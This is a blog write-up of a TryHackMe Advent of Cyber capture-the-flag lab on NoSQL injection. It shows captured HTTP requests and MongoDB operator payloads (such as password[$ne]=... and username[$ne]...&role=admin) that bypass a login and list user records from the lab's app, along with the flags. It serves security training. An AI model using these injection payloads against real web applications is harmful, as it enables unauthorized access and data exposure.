kryssar.se

Advent Of Cyber 3 - Day 7

Posted on Dec 7, 2021
tl;dr: SQLi

Interact with MongoDB after ssh’ing to the box

> use flagdb
> show collections
> db.flagColl.find()
{ "_id" : ObjectId("618806af0afbc09bdf42bd6a"), "flag" : "THM{8814a5e6662a9763f7df23ee59d944f9}" }

Interact with webpage on: http://10.10.137.111/login

try to catch a login event with burp-suite

POST /login HTTP/1.1
Host: 10.10.137.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.137.111
Connection: close
Referer: http://10.10.137.111/login

Cookie: connect.sid=s%3ATiJbg_zkCKqm-CXR13un1POmfLQWnW3c.6hOaaBdHJq3%2FxJxxprL5uXHFmrqC7%2FJpprEowkA2PB0

Upgrade-Insecure-Requests: 1

username=admin&password=admin

Because the page says that it’s a mongo-db , we can try to inject some commands in the input fields. username=admin&password=admin

thm-aoc3-day7

commonly used NoSQL syntax when injecting:

$eq - matches records that equal to a certain value
$ne - matches records that are not equal to a certain value
$gt - matches records that are greater than a certain value.
$where - matches records based on Javascript condition
$exists - matches records that have a certain field
$regex - matches records that satisfy certain regular expressions.

modify request to: username=admin&password[$ne]=nisse to make the password evaluation return true, and that way making the whole statement true.

the page then redirects to http://10-10-137-111.p.thmlabs.com/dashboard

with a link to the flag: Flag: THM{b6b304f5d5834a4d089b570840b467a8}

use the search page: http://10-10-137-111.p.thmlabs.com/search to list all users with role ‘guest’.

catch the request with burp, and send to repeater.

GET /search?username=db.find(guest&role=user HTTP/1.1
Host: 10-10-137-111.p.thmlabs.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Referer: http://10-10-137-111.p.thmlabs.com/search

Cookie: connect.sid=s%3AgGcqHIpnAhj3DaRDXMGrd78Bizik7Kwx.56QQxY0BaC7cpqYEOSFdjk7C27tWLGOqmCweYedHlTQ

Upgrade-Insecure-Requests: 1

modify the GET parameter and play around: GET /search?username=db.find(guest&role=user HTTP/1.1

the address-bar can also be used: 10-10-137-111.p.thmlabs.com/search?username[$ne]grinch&role=guest

Username details
ID:61749a80b534d3a130391b92:guest:guest
Username details
ID:61850f642f70bd35768c82f1:test:guest
Username details
ID:61850fb42f70bd35768c82f2:THM{2ec099f2d602cc4968c5267970be1326}:guest

and another flag is found: THM{2ec099f2d602cc4968c5267970be1326}

retrieve the mcskidy record from the gift-search page. http://10-10-137-111.p.thmlabs.com/search?username[$ne]mcskidy&role=admin

Username details
ID:61733f3a72e3abc63d253929:admin:admin
Username details
ID:61749a80b534d3a130391b91:tryhackme:admin
Username details
ID:6184f516ef6da50433f100f4:mcskidy:admin

in burp, change the parameter to: GET /search?username[$ne]mcskidy&role=admin HTTP/1.1 and get the same result/response as previously when tampering with the address bar.

EOF